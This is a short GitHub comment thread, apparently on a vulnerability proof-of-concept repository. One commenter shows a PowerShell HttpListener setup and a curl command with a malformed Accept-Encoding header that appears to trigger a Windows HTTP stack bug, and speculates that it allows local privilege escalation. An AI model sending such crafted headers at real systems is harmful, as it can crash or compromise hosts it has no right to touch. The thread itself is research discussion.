Question - Comment

[ghost]

I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/') 
$listener.Start()
curl.exe -H 'Accept-Encoding:  doar-e, ftw, imo, ,' http://localhost:8080/

Also which tool are you using to reverse with, for the images? Very cool

Cheers

[0vercl0k]

Heh fun - thanks for sharing :). It is a screenshot from IDA Pro / HexRays: https://hex-rays.com/ida-pro. Cheers Le mer. 19 mai 2021 à 09:40, secdev-01 ***@***.***> a écrit :

…

I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port. $listener = New-Object System.Net.HttpListener $listener.Prefixes.Add('http://localhost:8080/') $listener.Start() curl.exe -H 'Accept-Encoding: doar-e, ftw, imo, ,' http://localhost:8080/ Also which tool are you using to reverse with, for the images? Very cool Cheers — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#4>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AALIORJPRMOHWTKLI6NTZ7LTOPSYNANCNFSM45FB352A> .